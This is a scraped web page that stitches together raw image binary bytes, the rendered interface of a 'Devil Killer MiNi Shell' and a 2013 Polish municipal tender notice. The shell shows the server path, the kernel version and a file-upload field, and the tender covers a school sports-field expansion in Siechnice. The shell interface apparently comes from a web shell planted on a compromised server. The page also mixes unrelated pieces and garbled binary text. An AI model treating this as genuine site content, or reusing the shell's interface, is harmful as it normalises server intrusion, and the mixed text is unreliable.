JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/397708-N-2013.html

<p class="kh_header"><b>Siechnice: Rozbudowa boiska przy Szkole Podstawowej w Kotowicach - etap 2</b><br>
<b>Numer ogłoszenia: 397708 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa boiska przy Szkole Podstawowej w Kotowicach - etap 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie II etapu prac związanych z rozbudową boiska przy Szkole Podstawowej w Kotowicach przy ul. Podwalnej 1, działka nr 98/2, AM-1, obręb Kotowice, gmina Siechnice. Wykonawca zobowiązany będzie m.in. do rozbudowy infrastruktury sportowo-rekreacyjnej, tj.:
1)budowy bieżni o nawierzchni poliuretanowej i zeskoczni do skoku w dal,
2)montażu wysokiego ogrodzenia za bramką (piłkochwyt) - 25m, oraz wzdłuż boiska - 55m,
3)budowy chodników
4)dostawy i montażu ławek,

Teren sportowy przy szkole podstawowej realizowany jest etapami. W roku 2012r wykonane zostało boisko wielofunkcyjne o nawierzchni poliuretanowej. 

Przedmiotem niniejszego zamówienia są kolejne  elementy zagospodarowania terenu i obiekty sportowe w podziale na zadania:

Zadanie 1: Budowa bieżni 
Zakres robót obejmuje:
1)budowę bieżni prostej (w miejscu istniejącej bieżni ziemnej) o dł. 67,16 o nawierzchni syntetycznej ze skocznią do skoku w dal, o konstrukcji:
a)warstwa zewnętrzna użytkowa, grubość min. 2 mm, nawierzchnia syntetyczna poliuretanowa nanoszona metodą natryskową 
b)warstwa pośrednia elastyczna 11 mm, - mieszanina granulatu gumowego zespojonego lepiszczem, 
c)warstwa nośna - granulat gumowy, żwir płukany żywica syntetyczna - gr. warstwy 35 mm
d)warstwa klinująca z kruszywa łamanego o frakcji 0-4 mm, 5 cm 
e)warstwa konstrukcyjna z kruszywa łamanego o frakcji 4-30 mm, 15 cm 
f)warstwa odsączająca z piasku zagęszczanego do id > 0,5 gr, 10-20 cm 

Zadanie 2: budowę ogrodzenia wysokiego wzdłuż boiska o dł. 55m
Zakres robót obejmuje budowę ogrodzenia wysokiego wzdłuż boiska o wys. 4m i dł 55m o konstrukcji:
a)system panelowy wysokości 4 m w kolorze  zielonym wg palety producenta
b)mocowanie słupków w gruncie - za pomocą tulei wbetonowanych w fundament (50x50x80cm)
c)stopy betonowe wg systemowych rozwiązań producenta - Beton B20
d)słupki stalowe systemowe, o wysokości 5m, przekroju O60x2,5mm z wkładkami 
e)panele - siatka pleciona, stalowa ocynkowana powlekana warstwą termoplastycznego i mrozoodpornego PCV, oczko: 35x35 mm. Usztywnienie za pomocą rygla poprowadzonego w górnej części ogrodzenia. Siatka rozpięta na rzędach drutu napinającego przymocowanych do słupów pośrednich za pomocą specjalistycznych przelotek. Konstrukcja i siatka zabezpieczone antykorozyjnie. Kolor ogrodzenia zielony wg standardów producenta

Zadanie 3: Budowa piłkochwytu za bramką o wys. 6m i dł. 25m

Zakres robót obejmuje montaż 9-cio przęsłowego piłkochwytu o dł. 25m za bramką (na odcinku KL w projekcie - rys. nr 6) o następującej konstrukcji:
a)systemowy piłkochwyt o wys. 6m w kolorze  zielonym wg palety producenta
b)mocowanie słupków w gruncie - za pomocą tulei z profilu stalowego 90x90x3mm, dł.70 cm wbetonowanych w fundament
c)stopy betonowe - Beton B25, ( 50 x 50 x 100 cm )
d)słupki aluminiowe systemowe, o wysokości 6,7m, przekroju 80x80x3mm z wewnętrznym ożebrowaniem. Wzdłuż osi jednego boku słup musi posiadać wyprofilowany rowek do mocowania siatek za pomocą haczyków.
e)siatka bezwęzłowa, polipropylenowa, o oczkach 4,5x4,5cm do wys. 2m, 10x10 powyżej. Grubość splotu linki 3mm. Odporna na działanie promieni UV
f)siatka mocowana śrubami rzymskimi do słupków na linkach stalowych
g)skrajne przęsła piłko chwytu dodatkowo usztywnione zastrzałem ukośnym z profilu kwadratowego min.40x40x3mm stalowego ocynkowanego

Zadanie 4:  Budowa nawierzchni utwardzonej z kostki betonowej z dostawą i  montażem ławek bez oparcia (12 szt)
Zakres robót obejmuje wykonanie nawierzchni utwardzonej o następującej konstrukcji:
a)betonowa kostka brukowa, 6 cm 
b)miał kamienny 0-10 mm, 4 cm 
c)mieszanka mineralna o frakcji 0-31 mm, 10 cm 
d)piasek średni , 10 cm
e)obrzeże betonowe wym. 30 x 8 x 100 cm. na ławie betonowej z oporem jednostronnym
f)w obrębie nawierzchni wykończonej kostką betonową należy osadzić ławki z siedziskiem z desek drewnianych o gr.min 40mm bez oparcia na nogach z rur stalowych ocynkowanych min.fi 40x3mm  wbetonowanych w grunt.

Wykonawca ma obowiązek rekultywacji i odtworzenia  nawierzchni trawiastych po zakończeniu robót  

Szczegółowy zakres zamówienia określa dokumentacja projektowa, opracowana przez arch. Ewę Lisik, stanowiąca załącznik nr 7 do specyfikacji istotnych warunków zamówienia.

Uwaga: zmiana w projekcie: na odcinku KL (rys.nr 6) dł. 25m za bramką zamiast ogrodzenia wysokiego 4m należy zastosować piłko chwyt.  Jest to zmiana nieistotna do projektu. Zamawiający posiada zgodę projektanta.

Jednocześnie Zamawiający informuje, że przedmiot zamówienia opisany został w następujących dokumentach w podanej kolejno hierarchii ich ważności:
1)Specyfikacja Istotnych Warunków Zamówienia,
2)dokumentacja projektowa,
3)specyfikacja techniczna wykonania i odbioru robót,
4)przedmiar,

Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia dokumentacji w celu wykonania kopii we własnym zakresie. 
Dokumentację do skopiowania wypożycza się w godz. 15.00 - 15.30. Jej zwrot następuje następnego dnia do godz. 9.00

Dla prawidłowego oszacowania kosztów inwestycji przez Wykonawcę - jako dokument pomocniczy, Zamawiający załącza przedmiary robót. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania nakładów rzeczowych niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. 

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego zakończenia podstawowego zamówienia. 

 Zamawiający dopuszcza składanie ofert częściowych obejmujących wykonanie następujących zadań:
1)Część 1: Zadania 1, 2 i 3
2)Część 2: Zadanie 4
Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 Prawo zamówień publicznych przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.32.28-3, 45.23.32.22-1, 39.11.36.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w załączniku nr 3 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu warunków udziału w postępowaniu.

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie  musi  być złożone przez każdego wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi  załącznik nr 8 do  specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są:
1)poświadczenie lub
2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa w pkt. 2, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa niniejszym punkcie lub
3)dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz 1817).
Wykonawca zobowiązany jest do wskazania w ww. wykazie usługi niewykonanych lub wykonanych nienależycie.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:
1)wykaże, że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 roku (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji które zostały wydane na podstawie wcześniej obowiązujących przepisów, tj. osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej,
2)wraz z ofertą złoży podpisane oświadczenie z art. 22 ust. 1 ustawy Pzp, którego wzór stanowi załącznik nr 3 do specyfikacji istotnych warunków zamówienia.

UWAGA: Najpóźniej w dniu podpisania umowy, Wykonawca którego oferta została wybrana, będzie zobowiązany dostarczyć wszystkie niezbędne uprawnienia i aktualne zaświadczenia o przynależności do izby inżynierów budownictwa, potrzebne do realizacji zadania zgodnie z przepisami. Zamawiający odstąpi od podpisania Umowy, jeżeli Wykonawca najpóźniej w dniu podpisania umowy, nie dostarczy wszystkich niezbędnych dokumentów,  potrzebnych do realizacji zadania zgodnie z przepisami. 

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie prowadzonej działalności gospodarczej w zakresie realizowanym w ramach niniejszej umowy. Na każde żądanie Zamawiającego Wykonawca jest obowiązany okazać aktualną opłaconą polisę ubezpieczeniową lub inny dokument potwierdzający posiadanie aktualnego ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Dla części 1:

W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać minimum 1 zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. realizacją nawierzchni poliuretanowej na podbudowie o konstrukcji zbliżonej do podbudowy bieżni na obiektach sportowych typu: boiska, bieżnie.

Dla części 2:
W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać minimum 1 zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. realizacją nawierzchni utwardzonej z kostki betonowej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy i doświadczeniu, potencjale
technicznym lub zdolności ekonomicznej i finansowej innych podmiotów, niezależnie od charakteru
prawnego łączących go z nim stosunków, zgodnie z art. 26 ust. 2b PZP, zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji
niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz żąda złożenia
dokumentów dotyczących: a)zakresu dostępnych wykonawcy zasobów innego podmiotu, b)sposobu
wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji zamówienia, c)charakteru
stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d)zakresu i okresu udziału innego podmiotu
przy wykonywaniu zamówienia. W tym przypadku podmiot udzielający swoich zasobów zobowiązany jest
do złożenia wraz z ofertą zobowiązania zgodnie ze wzorem stanowiącym załączniki nr 9 i 10 do
specyfikacji istotnych warunków zamówienia. 2)jeżeli Wykonawca, wykazując spełnienie warunków, o
których mowa w art. 22 ust.1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych
w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji zamówienia, Zamawiający żąda od
Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 6.1 - 6.4
specyfikacji istotnych warunków zamówienia. 3)listę podmiotów należących do tej samej grupy kapitałowej,
o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej,
zgodnie ze wzorem stanowiącym odpowiednio załączniki nr 11 i 12 do specyfikacji istotnych warunków
zamówienia 4)w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia: a)oświadczenia wymienione w pkt. 6.1 i 6.2 specyfikacji istotnych warunków zamówienia
składane są przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. b)
dokumenty wymienione w pkt 6.3 specyfikacji istotnych warunków zamówienia składa każdy z
Wykonawców. W przypadku prowadzenia działalności w formie spółki cywilnej i przedłożenia do oferty
zaświadczenia o wpisie do ewidencji działalności gospodarczej należy do tego dokumentu dołączyć umowę
spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty aktualnego odpisu z właściwego
rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób reprezentowania spółki (składania
oświadczeń woli). c)dokumenty wymienione w pkt 6.4 i 6.7 specyfikacji istotnych warunków zamówienia
muszą potwierdzać spełnienie warunków szczegółowych łącznie przez Wykonawców składających
wspólnie ofertę. 5)pełnomocnictwo dla podmiotów występujących wspólnie (konsorcjum, spółka cywilna),
jeżeli zaistnieje taka sytuacja, zgodnie z art. 23 ustawy Prawo zamówień publicznych. W razie wyboru
oferty podmiotów występujących wspólnie, Zamawiający zażąda przed zawarciem umowy - stosownie do
art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów. Oferta konsorcjum musi spełniać
następujące wymagania - zawierać odrębne i niezależne dla każdego uczestnika konsorcjum wszystkie
dokumenty i oświadczenia wymienione powyżej, podpisana w taki sposób, by zobowiązywała prawnie
wszystkie strony - to znaczy podpisana przez przedstawiciela konsorcjum, którego upoważnienie do
złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli
członków konsorcjum 6)pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu
wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze 7)Zaakceptowane istotne postanowienia umowy -
druk w załączeniu (Załącznik nr 6 do specyfikacji istotnych warunków zamówienia - Istotne warunki umowy)
8)Formularz cenowy - opracowany zgodnie z załącznikiem nr 2 do specyfikacji istotnych warunków
zamówienia 9)oświadczenie o zapoznaniu się z terenem, zaakceptowaniu warunków przetargu oraz
stawek i narzutów do negocjacji wyceny robót dodatkowych i/lub uzupełniających - załącznik nr 5 do
specyfikacji istotnych warunków zamówienia. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez
